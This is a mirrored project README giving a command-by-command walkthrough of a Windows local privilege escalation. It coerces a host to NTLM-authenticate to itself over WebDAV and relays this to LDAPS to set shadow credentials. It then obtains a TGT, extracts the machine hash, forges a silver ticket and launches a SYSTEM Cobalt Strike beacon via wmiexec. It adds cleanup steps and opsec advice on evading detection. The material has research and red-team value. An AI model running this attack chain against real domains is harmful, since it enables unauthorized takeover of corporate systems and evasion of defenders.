Code Monkey home page Code Monkey logo

ntlmrelay2self's Introduction

NTLMRelay2Self

NTLMRelay2Self over HTTP (Webdav)

An other No-Fix LPE

Just a walkthrough of how to escalate privileges locally by forcing the system you landed initial access on to reflectively authenticate over HTTP to itself and forward the received connection to an HTTP listener (ntlmrelayx) configured to relay to DC servers over LDAP/LDAPs for either setting shadow credentials or configuring RBCD.

This would result in a valid kerberos TGT ticket that can be used to obtain a TGS for a service (HOST/CIFS) using S4U2Self by impersonating a user with local administrator access to the host (domain admin ..etc), or alternatively, it's also possible to retrieve the machine account's NTLM hash with getnthash.py and then create a silver ticket.

Lastly, use the TGS or silver ticket to spawn a system (session 0) process, this can be achieved by simply using WMIExec or alternatively using SCMUACBypass script to rely on kerberos for auth to interact with the SCM and create a service in the context of SYSTEM.

The steps below lists all the actions taken to escalate privileges locally on an up to date Windows 10 (1909) system, the cobalt strike beacon (or any other c2 agent) is running in the context of an unprivileged user LAB\User1.

Domain: lab.local
DC IP: 10.2.10.1
Win10 IP: 10.10.177.112
Linux machine CS client running on: 172.16.1.5

Steps:

  1. Start the WebClient service from an unprivileged context:
    inline-execute StartWebClientSvc.x64.o sc_query webclient

  2. On your cobalt strike beacon, setup a socks proxy and reverse port forward:
    socks 5009
    rportfwd_local 80 172.16.1.5 80

  3. Check if msDS-KeyCredentialLink attribute is Not already set on the current WIN10 machine account.
    ldapsearch "(&(objectClass=computer)(sAMAccountName=WIN10*))" sAMAccountName,msDS-KeyCredentialLink

  4. Setup the Listener on Linux system CS client is running on:
    proxychains python3 ntlmrelayx.py -domain lab.local -t ldaps://10.2.10.1 --shadow-credentials --shadow-target WIN10\$

  5. Coerce the WIN10 system to authenticate to itself to port 80 (HTTP), this requires the WebClient service and the Printer Spooler service to be running on WIN10::
    proxychains python3 printerbug.py "lab.local/User1:[email protected]" wind10@80/print
    Alternatively, you can use PetitPotam:
    python3 PetitPotam.py -u User1 -p Passw0rd01 -d lab.local WIN10@80/print 10.10.177.112

  6. If the previous two (2) steps were executed with no error, you should get a message stating shadow credentials were successfully set on the WIN10$ machine account, you can quiclky check for that using:
    ldapsearch "(&(objectClass=computer)(sAMAccountName=WIN10*))" sAMAccountName,msDS-KeyCredentialLink


The remaining steps are standard PKINIT actions to get a TGT for WIN10$, then recover the NT Hash and lastly create a silver ticket for the HOST\WIN10 SPN:

  1. Request a TGT for WIN10$:
    proxychains python3 gettgtpkinit.py -cert-pfx WIN10.pfx -pfx-pass 8kX4grjUrY8gvzjrphl5 lab.local/WIN10$ WIN10.ccache

  2. export KRB5CCNAME=/PATH_TO/WIN10.ccache

  3. Get the NT Hash:
    proxychains python3 getnthash.py -key 397eef25429f6b7249a11dfaa874df5c92bf44974b1bb962591937d656f0e827 -dc-ip 10.2.10.1 lab.local/WIN10$

  4. Create a silver ticket for the HOST SPN:
    impacket-ticketer -domain-sid S-1-5-21-81107902-1099128984-1836738286 -domain lab.local -spn HOST/WIN10.LAB.LOCAL -nthash db6484c89c273e269a23b1bdc53f7cdf -user-id 1155 Administrator

  5. Export the silver ticket for kerberos auth:
    export KRB5CCNAME=/PATH_TO/Administrator.ccache

  6. Get a SYSTEM beacon using Wmiexec:
    proxychains4 python3 wmiexec.py -nooutput -silentcommand -dc-ip 10.2.10.1 -k -no-pass lab.local/[email protected] 'C:\Users\User1\Desktop\Files\mcbuilder.exe'
    Or alternatively use SCMUACBypass script from James (@tiraniddo)

Cleanup:

  1. Export the TGT created in step 8:
    export KRB5CCNAME=/PATH_TO/WIN10.ccache

  2. Get the public key set on ms-dsKeyCredentialLink GUID:
    proxychains python3 pywhisker.py -u "WIN10$" -d "lab.local" --dc-ip 10.2.10.1 -k --no-pass --target 'WIN10$' --action "list" -vv

  3. Remove the public key set:
    proxychains python3 pywhisker.py -u "WIN10$" -d "lab.local" --dc-ip 10.2.10.1 -k --no-pass --target 'WIN10$' --action "remove" -D 97dc9d92-6d23-6031-7e1d-b5a13e305c8b

  4. Check if the public key is removed:
    ldapsearch "(&(objectClass=computer)(sAMAccountName=WIN10*))" sAMAccountName,msDS-KeyCredentialLink

Notes:

  • Shadow Credentials requires LDAP signing and channel binding to be disabled, you can use LDAPRelayScan to confirm that.
  • Machine accounts are allowed to change their own LDAP attributes (Not applicable for user accounts), however keep in mind that this will only work in case if the ms-DSKeyCredentialLink attribute does not exist for the machine account we want to LPE on.
  • LDAP Signing and Channel Binding must be disabled on the DC (typical configuration for many DC deployments)
  • When Testing in a HomeLab, make sure you've:
    • Windows Server 2016 Functional Level for AD
    • A digital certificate for Server Authentication on DC.
    • Disable Windows Firewall on the Win10 system, this would not be a road block when dealing with real world organizations.

Opsec !!:

  • Using Ticketer for forging a silver ticket from the NT hash can be detected (ATA) by monitoring for RC4 encrypted Kerberos ticket, most modern MS environments rely on AES Kerberos encryption instead. an alternative would be to use S4U2Self to obtain a TGS ticket check gets4uticket from Dirk-jan.

  • SCMUACBypass creates a service, can be customized to update an existing service and point it to your beacon payload instead of cmd.exe, Wmiexec doesn't create any services, that does not mean that Wmiexec with -nooutput and -silentcommand have no detections. just an opsec-safe alternative with a minimal footprint, i could be wrong though, who knows.

  • Shadow Credentials changes the ms-DsKeyCredentialLink only, on the other hand RBCD requires the MachineQuota to be set to 10 for default domain users (not always the case), plus a computer object will need to be created or have control over an existing AD joined system with an SPN set (required for delegation), then reflect it in the AllowedToActOnBehalfOfOtherIdentity LDAP attribute.

Refs:

Credits:

Based on the research and tools/PoCs created by:

  • @tifkin_
  • @tiraniddo
  • @_dirkjan
  • @harmj0y
  • topotam

ntlmrelay2self's People

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.